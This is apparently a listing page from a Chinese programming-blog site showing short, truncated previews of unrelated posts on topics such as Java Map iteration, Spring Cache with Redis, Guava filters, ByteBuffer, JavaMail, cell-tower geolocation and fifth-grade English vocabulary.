         我这里做一个大胆的猜想,生物神经网络中的神经元中包含着一些化学和类似电路的结构,这些结构通常用来扮演类似我们在拓扑分析系统中的节点嵌入方程一样,使得我们的神经网络产生智能判断的能力,而这些嵌入到节点中的方程同时也扮演着"经验"的角色....      我们可以尝试一下...在某些神经
  • 通过LAC和CID获取经纬度信息 dai_lm laccid
    方法1: 用浏览器打开http://www.minigps.net/cellsearch.html,然后输入lac和cid信息(mcc和mnc可以填0),如果数据正确就可以获得相应的经纬度 方法2: 发送HTTP请求到http://www.open-electronics.org/celltrack/cell.php?hex=0&lac=<lac>&cid=&
  • JAVA的困难分析 datamachine java
    前段时间转了一篇SQL的文章(http://datamachine.iteye.com/blog/1971896),文章不复杂,但思想深刻,就顺便思考了一下java的不足,当砖头丢出来,希望引点和田玉。   -----------------------------------------------------------------------------------------
  • 小学5年级英语单词背诵第二课 dcj3sjt126com englishword
    money 钱 paper 纸 speak 讲,说 tell 告诉   remember 记得,想起 knock 敲,击,打 question 问题 number 数字,号码   learn 学会,学习 street 街道 carry 搬运,携带 send 发送,邮寄,发射   must 必须 light 灯,光线,轻的 front
  • linux下面没有tree命令 dcj3sjt126com linux
    centos p安装 yum -y install tree   mac os安装 brew install tree   首先来看tree的用法 tree 中文解释:tree 功能说明:以树状图列出目录的内容。 语  法:tree [-aACdDfFgilnNpqstux][-I <范本样式>][-P <范本样式
  • Map迭代方式,Map迭代,Map循环 蕃薯耀 Map循环Map迭代Map迭代方式
    Map迭代方式,Map迭代,Map循环   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年
  • Spring Cache注解+Redis hanqunfeng spring
    Spring3.1 Cache注解  依赖jar包: <!-- redis --> <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redis</artifactId>
  • Guava中针对集合的 filter和过滤功能 jackyrong filter
    在guava库中,自带了过滤器(filter)的功能,可以用来对collection 进行过滤,先看例子:    @Test public void whenFilterWithIterables_thenFiltered() { List<String> names = Lists.newArrayList("John"
  • 学习编程那点事 lampcy 编程androidPHPhtml5
    一年前的夏天,我还在纠结要不要改行,要不要去学php?能学到真本事吗?改行能成功吗?太多的问题,我终于不顾一切,下定决心,辞去了工作,来到传说中的帝都。老师给的乘车方式还算有效,很顺利的就到了学校,赶巧了,正好学校搬到了新校区。先安顿了下来,过了个轻松的周末,第一次到帝都,逛逛吧! 接下来的周一,是我噩梦的开始,学习内容对我这个零基础的人来说,除了勉强完成老师布置的作业外,我已经没有时间和精力去
  • 架构师之流处理---------bytebuffer的mark,limit和flip nannan408 ByteBuffer
    1.前言。   如题,limit其实就是可以读取的字节长度的意思,flip是清空的意思,mark是标记的意思 。 2.例子. 例子代码: String str = "helloWorld"; ByteBuffer buff = ByteBuffer.wrap(str.getBytes()); Sy
  • org.apache.el.parser.ParseException: Encountered " ":" ": "" at line 1, column 1 Everyday都不同 $转义el表达式
    最近在做Highcharts的过程中,在写js时,出现了以下异常:   严重: Servlet.service() for servlet jsp threw exception org.apache.el.parser.ParseException: Encountered " ":" ": "" at line 1,
  • 用Java实现发送邮件到163 tntxia java实现
    /* 在java版经常看到有人问如何用javamail发送邮件?如何接收邮件?如何访问多个文件夹等。问题零散,而历史的回复早已经淹没在问题的海洋之中。 本人之前所做过一个java项目,其中包含有WebMail功能,当初为用java实现而对javamail摸索了一段时间,总算有点收获。看到论坛中的经常有此方面的问题,因此把我的一些经验帖出来,希望对大家有些帮助。 此篇仅介绍用
  • 探索实体类存在的真正意义 java小叶檀 POJO
    一. 实体类简述    实体类其实就是俗称的POJO,这种类一般不实现特殊框架下的接口,在程序中仅作为数据容器用来持久化存储数据用的 POJO(Plain Old Java Objects)简单的Java对象   它的一般格式就是 public class A{ private String id; public Str
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他